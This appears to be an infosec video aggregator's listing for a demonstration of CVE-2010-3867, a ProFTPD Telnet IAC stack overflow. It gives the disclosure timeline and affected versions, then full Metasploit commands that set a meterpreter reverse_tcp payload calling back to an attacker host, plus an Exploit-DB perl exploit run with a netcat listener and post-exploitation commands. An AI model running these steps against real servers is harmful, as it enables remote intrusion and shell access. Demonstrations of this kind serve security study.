Description: Metasploit and Exploit-DB exploits demonstrations
Timeline :
Vulnerability reported to vendor by ZDI the 2010-09-24
Coordinated public release of advisory the 2010-11-02
Metasploit exploit released the 2010-11-05
Exploit-DB exploit released the 2010-11-07
PoC provided by:
jduck for Metasploit exploit
Kingcope for Exploit-DB exploit
References :
CVE-2010-3867
EDB-15449
Affected versions :
ProFTPD versions between 1.3.2rc3 and 1.3.3b
Tested on Debian Squeeze with :
ProFTPD proftpd-basic_1.3.3a-4_i386.deb
Description:
This module exploits a stack-based buffer overflow in versions of ProFTPD server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a large number of Telnet IAC commands, an attacker can corrupt memory and execute arbitrary code.
Metasploit demo :
use exploit/linux/ftp/proftp_telnet_iac
set RHOST 192.168.178.40
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
ipconfig
Exploit-DB demo :
nc -lvn 45295
perl proftpd_iac.pl 192.168.178.40 192.168.178.21 5
id
uname -a
ifconfig
Tags: metasploit , exploit , ftp , root , remote , hack ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.